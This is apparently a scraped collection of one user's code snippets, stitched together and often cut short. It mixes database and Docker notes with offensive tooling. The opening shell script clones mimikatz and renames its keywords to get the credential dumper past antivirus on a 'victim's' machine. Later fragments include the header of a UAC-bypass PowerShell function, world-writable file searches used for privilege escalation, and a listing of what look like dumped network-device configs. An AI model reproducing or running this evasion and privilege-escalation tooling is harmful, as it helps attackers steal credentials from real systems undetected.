bemonolit

# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., 
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

bemonolit

# Find World Writable Folders
find / -xdev -type d -perm -0002 -ls

# Find World Writable Files
find / -xdev -type f -perm -0002 -ls

bemonolit

MySQL Cheat Sheet

Help with SQL commands to interact with a MySQL database

MySQL Locations

• Mac /usr/local/mysql/bin
• Windows /Program Files/MySQL/MySQL version/bin
• Xampp /xampp/mysql/bin

Add mysql to your PATH

bemonolit

function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

bemonolit

Wordpress & Docker

This file will setup Wordpress, MySQL & PHPMyAdmin with a single command. Add the code below to a file called "docker-compose.yaml" and run the command

$ docker-compose up -d

# To Tear Down
$ docker-compose down --volumes

bemonolit

PSQL

Magic words:

psql -U postgres

Some interesting flags (to see all, use -h or --help depending on your psql version):

• -E: will describe the underlaying queries of the \ commands (cool for learning!)
• -l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)

bemonolit

#!/bin/sh

# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses

# Configure every saved WiFi connection in NetworkManager with a spoofed MAC
# address, seeded from the UUID of the connection and the date eg:
# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20'

# This makes your MAC impossible(?) to track across WiFi providers, and
# for one provider to track across days.

bemonolit

# /etc/NetworkManager/conf.d/30-randomize-mac-address.conf

# REQUIRES NETWORK MANAGER >= 1.4.1 (Ubuntu Zesty and above)

# Thanks to https://blogs.gnome.org/thaller/2016/08/26/mac-address-spoofing-in-networkmanager-1-4-0/

# This randomize your MAC address for *new* connections

# Be sure to change your existing (saved) connections in
# /etc/NetworkManager/system-connections/*

bemonolit

.
├── matree
├── swift
│   ├── 00503_0_254.242_2013mar02
│   ├── 00546_0_ensbdasa-09aug2013
│   ├── 00553_0_ensbdpix3-09aug2013
│   ├── 00554_0_ensbdpix4-09aug2013
│   ├── 00555_0_ensbdrtr1-2013aug09
│   ├── 00557_0_ENSBDVPN1-02AUG2013
│   ├── 00558_0_ENSBDVPN2-02AUG2013

bemonolit

#!/usr/bin/env python
import sys

if __name__ == "__main__": 
	if len(sys.argv) != 2:
		print "usage: %s names.txt" % (sys.argv[0])
		sys.exit(0)

	for line in open(sys.argv[1]):
		name = ''.join([c for c in line if  c == " " or  c.isalpha()])